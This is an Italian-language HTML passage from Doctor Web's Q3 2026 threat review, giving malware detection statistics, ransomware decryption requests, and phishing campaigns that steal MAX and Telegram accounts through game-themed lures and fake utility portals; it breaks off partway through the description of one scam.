&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web, nel III trimestre 2026 gli utenti riscontavano le minacce il 14,86% meno spesso rispetto al II trimestre. Il numero di file unici adoperati negli attacchi è diminuito del 49,26%. Inoltre, rispetto al periodo di osservazione precedente, i nomi unici tra le minacce rilevate sono stati il 63,39% in meno. Prevalentemente sui dispositivi protetti venivano rilevati i programmi pubblicitari e i trojan pubblicitari, le applicazioni malevole che rubano password e altre informazioni riservate, nonché i dropper e i downloader che installano varie minacce nel sistema target. Inoltre, come anche in precedenza, sono stati attivi i trojan adoperati per l'avvio automatico di altre applicazioni malevole.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Il numero di richieste di decriptazione pervenute al Servizio di supporto tecnico di Doctor Web è aumentato del 5,85% rispetto al II trimestre. Le richieste prevalentemente erano connesse con i ransomware di criptazione &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; e &lt;b&gt;Trojan.Encoder.44474&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Nel traffico email i rilevamenti più frequenti sono stati gli script malevoli, la maggior parte dei quali costituivano i downloader e i dropper che installano altre minacce nel sistema attaccato. Oltre a ciò, tramite email venivano distribuiti i documenti di phishing, gli exploit e le varie applicazioni trojan. Tra queste ultime, similmente agli script malevoli sopra indicati, l'attività più alta è stata quella dei dropper e dei downloader.&lt;/p&gt;

&lt;p&gt;Nel III trimestre, gli analisti internet dell'azienda Doctor Web hanno continuato a osservare una crescita dell'interesse dei truffatori verso gli utenti dell'applicazione di messaggistica istantanea russa MAX. I nostri specialisti hanno rilevato numerosi nuovi siti di phishing creati allo scopo di furto degli account di questa piattaforma. Allo stesso tempo, i malintenzionati, come in precedenza, preservavano il loro interesse verso il dirottamento degli account di altre piattaforme di messaggistica, incluso Telegram. Gli utenti riscontravano anche altri siti di phishing, tra i quali erano ennesime false risorse internet di banche.&lt;/p&gt;

&lt;p&gt;A luglio il laboratorio antivirus Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15276" target="_blank"&gt;ha segnalato&lt;/a&gt; un trojan che attaccava gli sviluppatori software. Infetta progetti nei linguaggi di programmazione C++ e C#, e di conseguenza, le applicazioni compilate anche diventano infette e partecipano all'ulteriore diffusione della minaccia. Oltre a ciò, se i progetti infetti vengono collocati in accesso aperto, altri sviluppatori, dopo averli scaricati e utilizzati, anche compromettono i propri sistemi e tutti i programmi creati. Questo trojan realizza più funzionalità malevole alla volta: funziona come uno stealer di dati, un cryptominer, un backdoor, nonché un clipper che ruba informazioni dagli appunti.&lt;/p&gt;

&lt;p&gt;Per quanto riguarda gli utenti di Android, durante gli ultimi 3 mesi i programmi malevoli più frequentemente riscontrati sono stati gli &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, che consentono di reindirizzare il traffico dei malintenzionati attraverso i dispositivi infettati. Inoltre, si registrava una crescita dell'attività dei trojan bancari Android.Banker&lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Tra i leader per il numero di rilevamenti rimangono i programmi Android modificati tramite strumenti di hacker. Gli autori di virus li utilizzano per proteggere le applicazioni malevole dal rilevamento e dell'analisi.&lt;/p&gt;

&lt;p&gt;Durante il III trimestre, gli analisti di virus Doctor Web hanno individuato decine di programmi trojan sullo store di app Google Play. Tra di essi erano numerosi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Joker&amp;lng=it"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, che abbonano le vittime a servizi a pagamento. In particolare, i nostri esperti hanno scoperto che in alcune nuove varianti di questi programmi malevoli è aggiunta una funzionalità che consente di trasformare i dispositivi infettati in nodi di uscita di una botnet proxy.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze di III trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Gli utenti riscontravano diverse minacce meno spesso.&lt;/li&gt;
        &lt;li&gt;È diminuito il numero di file unici utilizzati negli attacchi.&lt;/li&gt;
        &lt;li&gt;Tra le minacce rilevate erano meno nomi unici.&lt;/li&gt;
        &lt;li&gt;Il numero di richieste di decriptazione dei file colpiti dai trojan ransomware di criptazione è aumentato rispetto al II trimestre.&lt;/li&gt;
        &lt;li&gt;I truffatori internet hanno continuato ad attaccare gli utenti dell'app di messaggistica russa MAX allo scopo di ottenere l'accesso ai loro account.&lt;/li&gt;
        &lt;li&gt;Gli analisti di virus Doctor Web hanno individuato un pericoloso trojan multifunzionale, che è mirato agli sviluppatori software e, per diffondersi, infetta progetti nei linguaggi di programmazione C++ e C#.&lt;/li&gt;
        &lt;li&gt;Le minacce Android più diffuse sono stati i trojan dalla famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Proxy&amp;lng=it"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, che consentono di reindirizzare il traffico di rete dei malintenzionati attraverso i dispositivi infettati.&lt;/li&gt;
        &lt;li&gt;Sullo store di app Google Play sono state rilevate nuove applicazioni malevole.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/01_stat_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/01_stat_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse di III trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Software pubblicitario utilizzato come installer intermedio di programmi pirata.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan scritto nel linguaggio di programmazione Go e studiato per caricare nel sistema di destinazione vari cryptominer e software pubblicitari. Il programma malevolo è un file DLL e si trova in &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Per avviarsi, sfrutta la vulnerabilità di classe DLL Search Order Hijacking nel client torrent uTorrent.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PWS.Salat.390&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma trojan che ruba le password di vari servizi web, nonché altre informazioni riservate.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un client torrent che installa software indesiderati sul dispositivo.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Proxy.32&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma che trasforma il computer target in un nodo di uscita di una rete proxy e consente di reindirizzare il traffico di terze parti attraverso il dispositivo.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistiche delle applicazioni malevole nel traffico email&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/02_mail_traffic_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/02_mail_traffic_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Minacce più diffuse nel traffico email di III trimestre 2026&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;X97M.DownLoader.2343&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;File XLSX (formato di fogli di calcolo Microsoft Excel) con un oggetto OLE che scarica un file malevolo sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.9376&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo JavaScript che scarica nel sistema target altri software malevoli.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.Starter.541&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo in formato Visual Basic Script. È progettato per avviare varie applicazioni malevole sui computer di destinazione.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Muldrop.1417&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo in formato JavaScript, che avvia il malware in esso nascosto nel sistema target.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;

&lt;p&gt;Rispetto al II trimestre, è aumentato del 5,82% il numero di richieste di decriptazione dei file interessati dai programmi trojan ransomware di criptazione.&lt;/p&gt;

&lt;p&gt;Dinamica del numero di richieste di decriptazione pervenute al Servizio di supporto tecnico Doctor Web:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/03_encoder_requests_q3_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/03_encoder_requests_q3_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Le richieste degli utenti prevalentemente erano connesse con l'attività dei seguenti ransomware di criptazione:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — il 13,98% delle richieste&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — il 3,76% delle richieste&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.44474&lt;/b&gt; — il 3,23% delle richieste&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356&lt;/b&gt; — il 2,69% delle richieste&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383&lt;/b&gt; — il 2,15% delle richieste&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Frode online&lt;/h3&gt;

&lt;p&gt;Nel III trimestre 2026 è continuata la crescita dell'interesse dei truffatori verso gli utenti dell'applicazione di messaggistica istantanea russa MAX, già osservata dagli analisti internet dell'azienda Doctor Web nel trimestre precedente. Durante gli ultimi tre mesi, i nostri specialisti hanno individuato un grande gruppo di siti indesiderati con uno stile di design simile, creati dai malintenzionati allo scopo di rubare gli account di questa piattaforma di messaggistica. Su questi siti le potenziali vittime presumibilmente potrebbero ottenere l'accesso agli svariati web service e servizi. A tale scopo, veniva suggerito a loro con vari pretesti di fornire il proprio numero di cellulare e quindi il codice di verifica pervenuto su di esso. In una serie di casi, agli utenti veniva detto direttamente che, per ottenere il servizio desiderato, è necessario entrare nel proprio account MAX. In altri casi, l'autenticazione non veniva menzionata, e il numero di telefono e il codice di conferma presumibilmente sarebbero richiesti solo per verificare che i visitatori non siano bot. Tuttavia, indipendentemente dal motivo dichiarato, se gli utenti cadevano nella trappola e fornivano i relativi dati, l'esito era uno e stesso: i truffatori ottenevano l'accesso ai loro account. È interessante notare che tali siti web spesso contenevano errori di ortografia, grammatica e punteggiatura.&lt;/p&gt;

&lt;p&gt;Uno dei pretesti utilizzati dagli attaccanti è stata la ripresa in Russia all'inizio dell'estate dell'attività della piattaforma di gioco Roblox. Esso è popolare tra i bambini e gli adolescenti — un pubblico tradizionalmente più vulnerabile alle minacce cyber e pertanto un target attraente per i malintenzionati.&lt;/p&gt;

&lt;p&gt;In uno degli scenari, "all'insegna dello sblocco" di Roblox, alle potenziali vittime venivano offerte in regalo monete gratuite Robux: la valuta digitale del gioco del servizio web. A seconda del sito, i truffatori promettevano da mille a 30mila monete:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/04_fake_max1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/04_fake_max1.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/05_fake_max2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/05_fake_max2.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Per "riceverli", gli utenti dovevano cliccare sul pulsante corrispondente (ad esempio, "Preleva" o "Ricevi"), fornire un numero di telefono per la "conferma" e quindi inserire il codice di verifica ricevuto via SMS o direttamente nell'app di messaggistica MAX:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/06_fake_max3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/06_fake_max3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In altre varianti, ai visitatori venivano offerti vari script e cheat per Roblox, oggetti giocabili rari, nonché "tapper" (dall'inglese &lt;em&gt;tap&lt;/em&gt; "picchiettare") — semplici giochi e applicazioni clicker, dove, facendo tap sullo schermo, si accumulano risorse virtuali (punti, bonus, monete), le quali in seguito presumibilmente potrebbero essere trasferite verso un determinato gioco. Per "accedere" a tali contenuti, le potenziali vittime dovevano in modo analogo cliccare sul pulsante richiesto ("Scarica", "Conferma" ecc.) e fornire un numero di telefono per la "conferma":&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/07_fake_max4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/07_fake_max4.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/08_fake_max5.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/08_fake_max5.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;I cybercriminali sfruttavano l'immagine di un altro gioco popolare tra i giovanissimi: Brawl Stars. Similmente al tema di Roblox, i siti truffaldini offrivano gratis alle potenziali vittime oggetti e bonus utilizzabili all'interno del gioco. Gli utenti di MAX presumibilmente potrebbero ottenerli scansionando uno speciale codice QR:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/09_fake_max6.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/09_fake_max6.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/10_fake_max7.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/10_fake_max7.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Per "ottenere" il relativo codice QR, sarebbe necessario "superare la verifica tramite MAX" fornendo il proprio numero di cellulare e il codice ricevuto via SMS o nell'app di messaggistica:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/11_fake_max8.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/11_fake_max8.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/12_fake_max9.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/12_fake_max9.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Inoltre, su alcuni di questi siti di phishing, i malintenzionati promettevano vari regali, presumibilmente a nome sia del gioco stesso che dei suoi sviluppatori: ad esempio, scatole di premi gratuite:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/13_fake_max10.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/13_fake_max10.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/14_fake_max11.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/14_fake_max11.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;I truffatori promettono regali da Brawl Stars e SUPERCELL, come scatole gratuite con oggetti giocabili (ad esempio, scatole del personaggio Bolt). Gli utenti vengono invitati a cliccare sul pulsante di conferma e fornire un numero di cellulare insieme al codice di verifica&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Oltre alle offerte di vari bonus e regali per i giochi più popolari, i cybercriminali cercavano di attirare le potenziali vittime con altri pretesti. In particolare, offrendo presunti servizi di promozione sui social network, ad esempio su Likee. I truffatori promettevano un "aumento artificiale" del numero di iscritti, valutazioni e commenti, ma per ottenere questo, gli utenti presumibilmente dovrebbero autenticarsi con l'app di messaggistica MAX:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/15_fake_max12.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/15_fake_max12.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sito di phishing promette la promozione su Likee, ma ciò presumibilmente richiederebbe l'autenticazione tramite l'app di messaggistica MAX&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Alcuni di questi siti suggerivano ai visitatori di installare mod (versioni modificate) di MAX specializzate, le quali, a quanto si affermava, consentirebbero agli utenti di fissare brani musicali nel profilo dell'app di messaggistica. Per "ottenere" una simile mod, gli utenti dovevano eseguire l'autenticazione con il numero di cellulare ed entrare nel proprio account. Va notato che la possibilità di aggiungere musica al profilo non è attualmente presente nella versione ufficiale di MAX, ma esiste in alcuni altri servizi web concorrenti. I truffatori contano sul quello che le potenziali vittime, a caccia di funzionalità attraenti, abbassino la guardia e cadano nella trappola.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/16_fake_max13.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/16_fake_max13.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sito web fraudolento offre "la possibilità di aggiungere brani musicali al profilo MAX"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Si riscontravano anche altri scenari di inganno. Ad esempio, alcune risorse internet online offrivano agli utenti l'accesso a un registro elettronico di classe per il controllo dei voti scolastici:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/18_fake_max15.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/18_fake_max15.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Altri siti presumibilmente consentirebbero di utilizzare la versione web di MAX e suggerivano di autenticarsi tramite il numero di telefono per "accedere al profilo":&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/19_fake_max16.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/19_fake_max16.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/20_fake_max17.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/20_fake_max17.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Alcune di queste risorse online fraudolente promettevano di aiutare a identificare il nome con cui la potenziale vittima è scritta nell'elenco dei contatti di altri utenti. A tal fine, ai visitatori veniva suggerito di "confermare la propria identità" entrando nell'account MAX:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/21_fake_max18.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/21_fake_max18.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Una serie di siti prometteva l'accesso gratuito a materiali privati di blogger e creatori di contenuti della categoria per adulti, inclusa la possibilità di visualizzare archivi multimediali trapelati e ottenere un abbonamento di prova in servizi web specializzati. In questo caso, la richiesta dei truffatori di eseguire l'autenticazione tramite l'app di messaggistica MAX indicando il codice di conferma veniva giustificata, tra l'altro, dalla necessità di "protezione dai bot e dal blocco":&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/22_fake_max19.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/22_fake_max19.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/23_fake_max20.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/23_fake_max20.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Allo stesso tempo, nell'ambito di questa campagna si trovavano sotto attacco non solo l'audience di MAX, ma anche quelle di altre piattaforme di messaggistica istantanea, incluso Telegram. Così, alcuni dei siti rilevati imitavano la chat con l'account ufficiale della piattaforma di messaggistica e, presumibilmente a suo nome, offrivano alle potenziali vittime un regalo: un abbonamento a Telegram Premium.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/24_fake_telegram1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/24_fake_telegram1.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/25_fake_telegram2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/25_fake_telegram2.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Per "ottenerlo", gli utenti dovevano eseguire l'accesso al proprio account inserendo il numero di cellulare e il codice di verifica monouso arrivato su di esso:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/26_fake_telegram3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/26_fake_telegram3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;In uno scenario simile, i malintenzionati promettevano alle potenziali vittime la possibilità di ricevere gratis regali virtuali dell'ecosistema Telegram dalle varie collezioni, quali Toy Bear (orsacchiotto di peluche), Snoop Dogg e altre. A questo scopo, i truffatori chiedevano gli utenti di "superare una verifica" (ad esempio, quella presumibilmente volta ad accertarsi che non siano robot e a garantire che ciascun visitatore riceva il regalo una sola volta), per la quale gli utenti dovevano fornire il proprio numero di cellulare e quindi il codice di conferma. Non è da escludere che queste varianti di siti fraudolenti, similmente a quelle a tema videoludico, siano rivolte, in primo luogo, ai bambini e agli adolescenti:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/27_fake_telegram4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/27_fake_telegram4.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/28_fake_telegram5.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/28_fake_telegram5.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;I cybercriminali anche cercavano di attirare le potenziali vittime con la possibilità di ottenere stelle di Telegram (la valuta digitale interna dell'applicazione) per "l'iscrizione" a determinati canali all'interno della piattaforma. Anche in questo caso, gli utenti venivano invitati a entrare nel proprio account Telegram e fornire il codice di verifica:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/29_fake_telegram6.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/29_fake_telegram6.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Nel III trimestre 2026 gli esperti Doctor Web osservavano un'ulteriore evoluzione degli schemi fraudolenti mirati al furto dei dati personali e degli account in vari servizi web. Uno degli scenari più diffusi nell'arsenale dei truffatori rimane quello dell'informare gli utenti della presunta compromissione dei loro account. Di solito, i malintenzionati mettono subito le potenziali vittime di fronte al fatto dell'avvenuta "divulgazione" dei loro dati e alla necessità di intraprendere misure urgenti per proteggere le informazioni riservate (ad esempio, cliccando su un link, chiamando "l'assistenza" ecc.). Tuttavia, in una serie dei casi individuati dai nostri analisti internet, sui siti di phishing l'intimidazione con un "avvenuto" hackeraggio deliberatamente si svolgeva per gradi. Passo dopo passo, l'utente viene indotto a diventare sempre più nervoso, fino a perdere la vigilanza e a compiere le azioni desiderate dai malintenzionati. Tra i siti con il simile schema di inganno, erano, ad esempio, ulteriori falsi portali internet di fornitori dei servizi di pubblica utilità.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/30_scam_energ1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/30_scam_energ1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sito di phishing, camuffato da risorsa web ufficiale di una società dell'energia elettrica russa, suggerisce di eseguire l'acceso all'account&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dopo che la potenziale vittima, credendo di trovarsi sul vero sito, inserisce le proprie credenziali di accesso al relativo account, la risorsa fraudolenta simula il processo di autenticazione tramite Gosuslugi (portale web dei servizi statali russo) e la "sincronizzazione" con i database di diversi enti governativi:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/31_scam_energ2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/31_scam_energ2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Il sito simula l'autenticazione tramite Gosuslugi e la sincronizzazione con i "database degli enti governativi"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Tuttavia, successivamente il sito segnala che l'account di Gosuslugi dell'utente sarebbe stato hackerato. Per la maggiore credibilità, fornisce informazioni su un certo dispositivo da cui presumibilmente sarebbe stato eseguito un accesso a Gosuslugi, nonché indica una distante posizione geografica "dell'avvenuta" connessione non autorizzata. Il sito avvisa, inoltre, che, se queste azioni sono state eseguite non dall'utente stesso, il suo account verrebbe bloccato. Per "annullare la sincronizzazione" del dispositivo estraneo e impedire la fuga delle informazioni personali, la potenziale vittima dovrebbe "contattare immediatamente l'operatore":&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/32_scam_energ3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/32_scam_energ3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Per "scollegare" il dispositivo estraneo dal proprio account Gosuslugi e "proteggere" i propri dati personali, incluse quelle del documento di identità, del codice di assicurazione e del codice fiscale, l'utente dovrebbe contattare "l'operatore"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dopo che l'utente clicca sul pulsante "Richiedi chiamata", il sito simula l'attesa visualizzando un conto alla rovescia di uno o più minuti e un messaggio su quello che la richiesta è in fase di elaborazione:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/33_scam_energ4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/33_scam_energ4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Il sito informa che la richiesta è in fase di elaborazione e che l'operatore di turno contatterà l'utente entro il tempo specificato&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Una volta scaduto il timer, non succede nulla che possa aiutare a chiarire la situazione. Invece di questo, sulla pagina web fraudolenta compaiono pulsanti che suggeriscono di ripetere la "richiesta", nonché di contattare autonomamente "l'operatore di turno":&lt;/p&gt;

&lt;div class="img"&gt;
